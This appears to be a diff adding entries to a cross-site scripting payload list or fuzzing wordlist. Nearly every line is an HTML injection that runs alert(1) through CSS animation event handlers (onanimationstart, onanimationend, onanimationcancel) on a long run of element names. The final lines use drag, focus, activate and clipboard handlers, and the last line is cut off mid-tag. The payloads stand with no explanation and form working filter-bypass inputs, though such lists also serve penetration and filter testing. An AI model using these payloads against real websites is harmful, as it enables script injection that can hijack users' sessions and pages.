+<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x style="position:absolute;" onanimationcancel="alert(1)"></sub> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table> 
+<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style="position:absolute;" onanimationcancel="alert(1)"></thead> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track> 
+<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style="position:absolute;" onanimationcancel="alert(1)"></tt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" onanimationcancel="alert(1)"></xmp> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address> +<style>@keyframes x{}</style><address style="animation-name:x" 
onanimationstart="alert(1)"></address> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo> 
+<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center> 
+<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del> +<style>@keyframes x{}</style><details 
style="animation-name:x" onanimationend="alert(1)"></details> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset> 
+<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationstart="alert(1)"></frame> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header> 
+<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex> +<style>@keyframes x{}</style><isindex style="animation-name:x" 
onanimationstart="alert(1)"></isindex> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark> +<style>@keyframes 
x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed> +<style>@keyframes 
x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationend="alert(1)"></output> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture> +<style>@keyframes 
x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp> +<style>@keyframes 
x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike> +<style>@keyframes x{}</style><strike 
style="animation-name:x" onanimationstart="alert(1)"></strike> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template> +<style>@keyframes x{}</style><template style="animation-name:x" 
onanimationstart="alert(1)"></template> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationend="alert(1)"></tr> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u> +<style>@keyframes x{}</style><ul 
style="animation-name:x" onanimationend="alert(1)"></ul> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> +<sub draggable="true" ondrag="alert(1)">test</sub> +<sub draggable="true" ondragend="alert(1)">test</sub> +<sub draggable="true" ondragenter="alert(1)">test</sub> +<sub draggable="true" ondragleave="alert(1)">test</sub> +<sub draggable="true" ondragstart="alert(1)">test</sub> +<sub id=x tabindex=1 onactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus> +<sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus> +<sub id=x tabindex=1 onfocus=alert(1)></sub> +<sub id=x tabindex=1 onfocusin=alert(1)></sub> +<sub onbeforecopy="alert(1)" contenteditable>test</sub> +<sub onbeforecut="alert(1)" contenteditable>test</sub> +<sub onbeforepaste="alert(1)" contenteditable>test</sub> +<sub 